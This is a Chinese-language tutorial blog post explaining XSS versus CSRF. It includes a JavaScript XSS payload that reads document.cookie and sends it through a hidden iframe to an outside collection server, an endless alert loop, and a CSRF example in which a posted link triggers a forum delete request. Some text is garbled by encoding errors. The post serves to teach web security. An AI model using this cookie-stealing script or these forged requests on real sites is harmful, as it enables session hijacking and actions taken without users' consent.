摘要:它允許惡意用戶將代碼注入到網(wǎng)頁(yè)上���,其他用戶在觀看網(wǎng)頁(yè)時(shí)就會(huì)受到影響。這類攻擊通常包含了以及用戶端腳本語(yǔ)言�����。更偏向于方法論��,更偏向于一種形式�����,只要是偽造用戶發(fā)起的請(qǐng)求��,都可成為攻擊���。
這兩個(gè)關(guān)鍵詞也是老生常談了��,但是還總是容易讓人忘記與搞混~���。
XSS與CSRF這兩個(gè)關(guān)鍵詞時(shí)常被拉出來一起比較(尤其是面試)��,我在這里也在寫一篇掃盲文����,也幫自己整理一下知識(shí)脈絡(luò)����。
這篇文章會(huì)用盡量“人話”的語(yǔ)言解釋這二個(gè)關(guān)鍵詞���,讓同學(xué)們對(duì)跨域��,安全有更深一層次的了解�����。
國(guó)際慣例���,先上一下維基百科:
XSS:跨站腳本(Cross-site scripting,通常簡(jiǎn)稱為XSS)是一種網(wǎng)站應(yīng)用程序的安全漏洞攻擊��,是代碼注入的一種。它允許惡意用戶將代碼注入到網(wǎng)頁(yè)上�,其他用戶在觀看網(wǎng)頁(yè)時(shí)就會(huì)受到影響。這類攻擊通常包含了HTML以及用戶端腳本語(yǔ)言�。
I
CSRF:跨站請(qǐng)求偽造(英語(yǔ):Cross-site request forgery),也被稱為 one-click attack 或者 session riding�,通常縮寫為 CSRF 或者 XSRF���, 是一種挾制用戶在當(dāng)前已登錄的Web應(yīng)用程序上執(zhí)行非本意的操作的攻擊方法��。
維基的解釋依舊高深莫測(cè)啊���,我用 “人話”給大家解釋一下吧。
XSS: 通過客戶端腳本語(yǔ)言(最常見如:JavaScript)
在一個(gè)論壇發(fā)帖中發(fā)布一段惡意的JavaScript代碼就是腳本注入���,如果這個(gè)代碼內(nèi)容有請(qǐng)求外部服務(wù)器��,那么就叫做XSS�!
CSRF:又稱XSRF����,冒充用戶發(fā)起請(qǐng)求(在用戶不知情的情況下),完成一些違背用戶意愿的請(qǐng)求(如惡意發(fā)帖,刪帖����,改密碼��,發(fā)郵件等)��。
很多同學(xué)會(huì)搞不明白XSS與CSRF的區(qū)別�����,雖然這兩個(gè)關(guān)鍵詞時(shí)常抱團(tuán)出現(xiàn)����,但他們兩個(gè)是不同維度的東西(或者說他們的目的是不一樣的)����。
XSS更偏向于方法論�,CSRF更偏向于一種形式,只要是偽造用戶發(fā)起的請(qǐng)求�����,都可成為CSRF攻擊��。
通常來說CSRF是由XSS實(shí)現(xiàn)的�,所以CSRF時(shí)常也被稱為XSRF[用XSS的方式實(shí)現(xiàn)偽造請(qǐng)求](但實(shí)現(xiàn)的方式絕不止一種���,還可以直接通過命令行模式(命令行敲命令來發(fā)起請(qǐng)求)直接偽造請(qǐng)求[只要通過合法驗(yàn)證即可])。
XSS更偏向于代碼實(shí)現(xiàn)(即寫一段擁有跨站請(qǐng)求功能的JavaScript腳本注入到一條帖子里���,然后有用戶訪問了這個(gè)帖子�,這就算是中了XSS攻擊了)��,CSRF更偏向于一個(gè)攻擊結(jié)果�����,只要發(fā)起了冒牌請(qǐng)求那么就算是CSRF了�。
簡(jiǎn)單來說,條條大路(XSS路�,命令行路)通羅馬(CSRF馬,XSRF馬)�����。
前面講了那么多理論介紹����,那么我們來看一看實(shí)際代碼吧。
【 Talk is cheap,Show me the code 】
場(chǎng)景:我在一條帖子里面寫下了如下代碼�,發(fā)了出去,然后陸陸續(xù)續(xù)有很多可愛(wu / zhi) 的用戶訪問到這個(gè)帖子����,然后用戶接下來的所有操作都由我這串代碼掌控了(各種姿勢(shì)混著玩~)
如下:
while(true){
alert("你關(guān)不掉我");
}
這個(gè)就是最原始的腳本注入了。
用戶進(jìn)來就麻煩了���,一直彈窗一直彈窗���。
那么XSS(跨站腳本)就是照瓢畫葫了,用JavaScript寫一個(gè)請(qǐng)求跨站的腳本就是XSS了�����,如下:
// 用 包起來放在評(píng)論中
(function(window, document) {
// 構(gòu)造泄露信息用的 URL
var cookies = document.cookie;
var xssURIBase = "http://192.168.123.123/myxss/";
var xssURI = xssURIBase + window.encodeURI(cookies);
// 建立隱藏 iframe 用于通訊
var hideFrame = document.createElement("iframe");
hideFrame.height = 0;
hideFrame.width = 0;
hideFrame.style.display = "none";
hideFrame.src = xssURI;
// 開工
document.body.appendChild(hideFrame);
})(window, document);
此段代碼攜帶著cookie信息傳輸給了 http://192.168.123.123/myxss/... 這段服務(wù)器�����,然后服務(wù)器的代碼就可以接收到了用戶的隱私消息�,繼而繼續(xù)做其他的業(yè)務(wù)處理(myxss/index.php 中寫一些可怕的代碼�����,如把用戶信息存進(jìn)自己的數(shù)據(jù)庫(kù))。
有沒感覺到背后一寒
看到這里感覺到危險(xiǎn)了吧(想想初學(xué)程序時(shí)我們的站點(diǎn)完全沒有這個(gè)意識(shí)�,活生生的是在裸奔),=
既然此段腳本注入能攜帶著用戶信息到收集服務(wù)器�����,那么再研究研究����,他自然能發(fā)郵件?發(fā)帖��?一系列業(yè)務(wù)邏輯�����? ~~當(dāng)然可以���!�����。
這里tips一下:上面的代碼僅僅是XSS��,并沒有發(fā)生CSRF���,因?yàn)?92.168.123.123/myxss/index.php 僅僅是把用戶信息存起來了而已�,他并沒有“偽造”用戶發(fā)起一些請(qǐng)求�,所以他只算是XSS攻擊而不算是CSRF攻擊,如果192.168.123.123/myxss/index.php 寫的代碼是 將當(dāng)前用戶的昵稱改為“我是大笨豬”���,那么就算是CSRF攻擊了�����,因?yàn)檫@段代碼偽造用戶發(fā)出了請(qǐng)求(但是用戶卻不自知)�����。
那么下面我介紹一下最最簡(jiǎn)單的CSRF攻擊(沒有用到XSS的哦):
一個(gè)論壇���,經(jīng)過我的多次抓包分析(著重分析請(qǐng)求返回頭,請(qǐng)求返回體)了解到這個(gè)論壇的刪帖操作是觸發(fā) csdnblog.com/bbs/delete_article.php?id=“X" 那么����,我只需要在論壇中發(fā)一帖,包含一鏈接:www.csdnblog.com/bbs/delete_article.php?id=“X" �,只要有用戶點(diǎn)擊了這個(gè)鏈接,那么ID為X的這一篇文章就被刪掉了�����,而且是用戶完全不知情的情況(敲黑板狀:此處我可沒有寫XSS腳本哦���,我純粹是發(fā)一個(gè)url地址出來而已����,既然刪除操作可以偽造��,那么只要我細(xì)細(xì)分析���,其他操作(發(fā)帖��,改名字��,發(fā)私信��,只要是這個(gè)論壇具有的功能)我都可以偽造咯����!
XSS與CSRF講完了��,回頭我會(huì)講下如何防范XSS與CSRF��。
今天國(guó)慶日,6天后國(guó)足將在西安迎戰(zhàn)敘利亞��,此戰(zhàn)勝負(fù)十分關(guān)鍵�!祝好運(yùn)!國(guó)足隊(duì)員加油��!
參考文章:
https://segmentfault.com/a/11... 《 總結(jié) XSS 與 CSRF 兩種跨站攻擊 》
http://www.lxway.com/48228121... 《CSRF CORS》
學(xué)習(xí)/(“抄”) 了不少文章(主要是demo代碼不想重復(fù)寫了)��,侵刪�����。
文章版權(quán)歸作者所有��,未經(jīng)允許請(qǐng)勿轉(zhuǎn)載,若此文章存在違規(guī)行為���,您可以聯(lián)系管理員刪除���。
轉(zhuǎn)載請(qǐng)注明本文地址:http://systransis.cn/yun/80593.html
